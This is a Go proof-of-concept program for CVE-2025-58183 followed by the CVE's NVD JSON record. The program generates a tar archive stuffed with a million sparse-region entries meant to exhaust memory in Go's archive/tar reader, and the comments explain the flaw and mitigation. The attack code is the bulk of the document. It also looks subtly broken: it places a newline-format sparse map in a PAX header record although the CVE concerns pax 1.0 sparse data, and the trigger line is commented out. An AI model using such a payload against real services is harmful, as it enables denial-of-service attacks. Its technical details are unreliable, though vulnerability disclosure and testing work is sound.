CVE-2025-58183

package main import ( "archive/tar" "bytes" "fmt" "io" ) func generateMaliciousSparseTar() ([]byte, error) { buf := new(bytes.Buffer) tw := tar.NewWriter(buf) // Create a header with PAX format sparse attributes hdr := &tar.Header{ Name: "malicious_sparse_file", Mode: 0644, Size: int64(1 << 40), // Large logical size Format: tar.FormatPAX, PAXRecords: make(map[string]string), } // Generate millions of sparse regions // This will cause unbounded memory allocation const numSparseRegions = 1000000 // PAX sparse format: SPARSE_EXTENSIONS (GNU sparse format) sparseData := "0 0\n" for i := 0; i < numSparseRegions; i++ { offset := int64(i * 4096) numBytes := int64(4096) sparseData += fmt.Sprintf("%d %d\n", offset, numBytes) } hdr.PAXRecords["GNU.sparse.map"] = sparseData if err := tw.WriteHeader(hdr); err != nil { return nil, err } // Write minimal data (sparse regions reference non-existent data) if _, err := tw.Write([]byte("X")); err != nil { return nil, err } if err := tw.Close(); err != nil { return nil, err } return buf.Bytes(), nil } func main() { fmt.Println("Generating malicious sparse tar archive...") maliciousTar, err := generateMaliciousSparseTar() if err != nil { fmt.Printf("Error generating tar: %v\n", err) return } fmt.Printf("Generated tar file size: %d bytes\n", len(maliciousTar)) fmt.Println("To trigger vulnerability, parse this with archive/tar.Reader") // Vulnerable code path tr := tar.NewReader(bytes.NewReader(maliciousTar)) for { hdr, err := tr.Next() if err == io.EOF { break } if err != nil { fmt.Printf("Error reading tar: %v\n", err) return } fmt.Printf("Processing file: %s\n", hdr.Name) // This will allocate unbounded memory for sparse processing // io.Copy(io.Discard, tr) // Uncomment to trigger memory allocation } } /* Vulnerability Explanation: 1. The tar archive contains a header with PAX sparse map attributes 2. PAXRecords["GNU.sparse.map"] contains millions of sparse region entries 3. When tar.Reader processes this header, it reads all sparse regions 4. Each sparse region may trigger memory allocation 5. Result: Small compressed input -> massive memory allocation -> DoS Mitigation: Upgrade to Go version with CVE-2025-58183 fix applied. */

{"cve": {"id": "CVE-2025-58183", "sourceIdentifier": "[email protected]", "published": "2025-10-29T23:16:19.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "references": [{"url": "https://go.dev/cl/709861", "source": "[email protected]"}, {"url": "https://go.dev/issue/75677", "source": "[email protected]"}, {"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI", "source": "[email protected]"}, {"url": "https://pkg.go.dev/vuln/GO-2025-4014", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}